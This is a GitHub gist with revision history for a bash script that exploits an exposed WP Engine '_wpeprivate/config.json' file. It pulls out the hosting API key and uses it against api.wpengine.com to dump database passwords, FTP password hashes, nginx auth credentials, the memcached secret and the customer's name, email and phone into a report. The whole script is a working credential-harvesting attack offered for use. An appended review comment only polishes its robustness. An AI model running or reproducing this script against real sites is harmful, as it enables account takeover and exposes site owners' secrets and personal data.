
@xrmr
Forked from hateshape/wpeprivate-config.sh
Created January 11, 2025 12:36

Revisions

  1. @hateshape hateshape revised this gist May 5, 2019. 1 changed file with 1 addition and 1 deletion.
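--- a/wpeprivate-config.sh
+++ b/wpeprivate-config.sh
@@ -44,7 +44,7 @@ echo -e ${BLUE}"Nginx Auth - "${GREEN} >> $ACCOUNTNAME-report.txt
 jq -r '.nginx_basic_auth_staging' $ACCOUNTNAME-site.json | grep -E '(user)|(password)' | cut -d\" -f2-4 | sed 's/"//g' >> $ACCOUNTNAME-report.txt
 
 echo -e ${BLUE}"\nMiscellaneous - "${GREEN} >> $ACCOUNTNAME-report.txt
-grep -E '(gophpr_enabled)|(memcached_secret)' $ACCOUNTNAME-site.json | cut -d\" -f2-4 | sed 's/"//g'|sed 's/,//' >> $ACCOUNTNAME-report.txt
+grep -E '(gopher_enabled)|(memcached_secret)' $ACCOUNTNAME-site.json | cut -d\" -f2-4 | sed 's/"//g'|sed 's/,//' >> $ACCOUNTNAME-report.txt
 
 echo -e ${BLUE}"\nUser Info - "${GREEN} >> $ACCOUNTNAME-report.txt
 echo "domain:"$(jq -r '.domain' $ACCOUNTNAME-customer.json) >> $ACCOUNTNAME-report.txt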
  2. @hateshape hateshape created this gist Jan 22, 2019.
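--- a/wpeprivate-config.sh
+++ b/wpeprivate-config.sh
@@ -0,0 +1,59 @@
+#!/bin/bash
+# If you find a site with /_wpeprivate/config.json file exposed, run this and get all kinds of fun goodies.
+# If it "no worked" (Technical Term) then you probably need to install jq!
+
+TARGET=$1
+TARGETDOMAIN=$(echo $TARGET | cut -d/ -f3)
+
+# Pretty Colors
+RESET='\033[00m'
+GREEN='\033[01;32m'
+BLUE='\033[01;34m'
+
+echo -e ${BLUE}"------------------------ Downloading '_wpeprivate/config.json' -------------------------"${RESET}
+echo -e ${GREEN}"curl -so $TARGETDOMAIN-config.json -k $TARGET/_wpeprivate/config.json"${RESET}
+curl -so $TARGETDOMAIN-config.json -k $TARGET/_wpeprivate/config.json
+
+WPEAPIKEY=$(jq '.' $TARGETDOMAIN-config.json | grep wpengine_apikey | awk '{print $2}' | cut -d, -f1 | sed 's/"//g')
+ACCOUNTNAME=$(jq '.' $TARGETDOMAIN-config.json | grep WPENGINE_ACCOUNT | awk '{print $2}' | cut -d, -f1 | sed 's/"//g' | sort -u)
+
+echo -e ${BLUE}"\n-------------------------- Make 1st API Call to api.wpengine.com -----------------------"${RESET}
+echo -e ${GREEN}"curl -so $ACCOUNTNAME-site.json -k https://api.wpengine.com/1.2/?method=site&account_name=$ACCOUNTNAME&wpe_apikey=$WPEAPIKEY"${RESET}
+curl -so $ACCOUNTNAME-site.json -k "https://api.wpengine.com/1.2/?method=site&account_name=$ACCOUNTNAME&wpe_apikey=$WPEAPIKEY"
+
+echo -e ${BLUE}"\n-------------------------- Make 2nd API Call to api.wpengine.com -----------------------"${RESET}
+echo -e ${GREEN}"curl -so $ACCOUNTNAME-customer.json -k https://api.wpengine.com/1.2/?method=customer-record&account_name=$ACCOUNTNAME&wpe_apikey=$WPEAPIKEY"${RESET}
+curl -so $ACCOUNTNAME-customer.json -k "https://api.wpengine.com/1.2/?method=customer-record&account_name=$ACCOUNTNAME&wpe_apikey=$WPEAPIKEY"
+
+echo -e ${BLUE}"\n----------------------------- Report - $(echo $TARGETDOMAIN) - $(echo $ACCOUNTNAME) -----------------------------"${RESET}
+echo -e ${BLUE}"Configuration Info - "${GREEN} >> $ACCOUNTNAME-report.txt
+grep -E '(site)' $ACCOUNTNAME-site.json | cut -d\" -f2-4 | sed 's/"//g' >> $ACCOUNTNAME-report.txt
+grep -E '(server_name)|(wp_version)' $ACCOUNTNAME-site.json | cut -d\" -f2-4 | sed 's/"//g' >> $ACCOUNTNAME-report.txt
+
+echo -e ${BLUE}"\nDomains - "${GREEN} >> $ACCOUNTNAME-report.txt
+jq -r '.all_domains' $ACCOUNTNAME-site.json | sed ':a;N;$!ba;s/\n//g' | sed 's|[{}"[]||g' | sed 's/ //g' | cut -d] -f1 >> $ACCOUNTNAME-report.txt
+echo -e ${BLUE}"\nDatabase Infos - "${GREEN} >> $ACCOUNTNAME-report.txt
+echo "db_password:"$(jq -r '.db_password' $ACCOUNTNAME-site.json) >> $ACCOUNTNAME-report.txt
+echo -e "db_password_encryption" >> $ACCOUNTNAME-report.txt
+jq -r '.db_password_encryption' $ACCOUNTNAME-site.json | sed -e $'s/,/\\\n/g' | sed 's|[{}",]||g' >> $ACCOUNTNAME-report.txt
+
+echo -e ${BLUE}"\nFTP Users and Password Hashes - "${GREEN} >> $ACCOUNTNAME-report.txt
+jq '.ftp_users | to_entries[]' $ACCOUNTNAME-site.json | sed 's|[{},]||g' | awk '{print $1 $2}' | sed 's/"//g' | grep -vE '(value:)|(^$)' | sed 's/path:/&\n/g' >> $ACCOUNTNAME-report.txt
+
+echo -e ${BLUE}"Nginx Auth - "${GREEN} >> $ACCOUNTNAME-report.txt
+jq -r '.nginx_basic_auth_staging' $ACCOUNTNAME-site.json | grep -E '(user)|(password)' | cut -d\" -f2-4 | sed 's/"//g' >> $ACCOUNTNAME-report.txt
+
+echo -e ${BLUE}"\nMiscellaneous - "${GREEN} >> $ACCOUNTNAME-report.txt
+grep -E '(gophpr_enabled)|(memcached_secret)' $ACCOUNTNAME-site.json | cut -d\" -f2-4 | sed 's/"//g'|sed 's/,//' >> $ACCOUNTNAME-report.txt
+
+echo -e ${BLUE}"\nUser Info - "${GREEN} >> $ACCOUNTNAME-report.txt
+echo "domain:"$(jq -r '.domain' $ACCOUNTNAME-customer.json) >> $ACCOUNTNAME-report.txt
+echo "account_id:"$(jq -r '.account_id' $ACCOUNTNAME-customer.json) >> $ACCOUNTNAME-report.txt
+echo "account_type:"$(jq -r '.account_type' $ACCOUNTNAME-customer.json) >> $ACCOUNTNAME-report.txt
+echo "full_name:"$(jq -r '.full_name' $ACCOUNTNAME-customer.json) >> $ACCOUNTNAME-report.txt
+echo "email:"$(jq -r '.email' $ACCOUNTNAME-customer.json) >> $ACCOUNTNAME-report.txt
+echo "phone:"$(jq -r '.phone' $ACCOUNTNAME-customer.json) >> $ACCOUNTNAME-report.txt
+
+echo -e ${GREEN}
+cat $ACCOUNTNAME-report.txt
+echo -e ${BLUE}"----------------------------------------------------------------------------------------"${RESET}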
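Review bot: `ACCOUNTNAME` and `WPEAPIKEY` are cut out of a JSON file that a remote server controls and are then expanded unquoted as output file names (`curl -so $ACCOUNTNAME-site.json`, `>> $ACCOUNTNAME-report.txt`), so an empty or crafted value decides which local path is written and how the command line is split. Checking the value before its first use, e.g. `[[ $ACCOUNTNAME =~ ^[A-Za-z0-9_-]+$ ]] || exit 1` (the allowed character set is an assumption), and quoting every expansion would close that. The report collects the database password, FTP password hashes, the memcached secret and customer contact data into a file created under the default umask, and the API key is printed to the terminal by the two `echo -e ${GREEN}"curl ..."` lines; `umask 077` near the top and leaving the key out of the echoed command would keep those values out of shared directories and scrollback. All three `curl` calls pass `-k`, so the API key travels over a connection whose certificate is never verified; the flag should not be needed on the two api.wpengine.com requests.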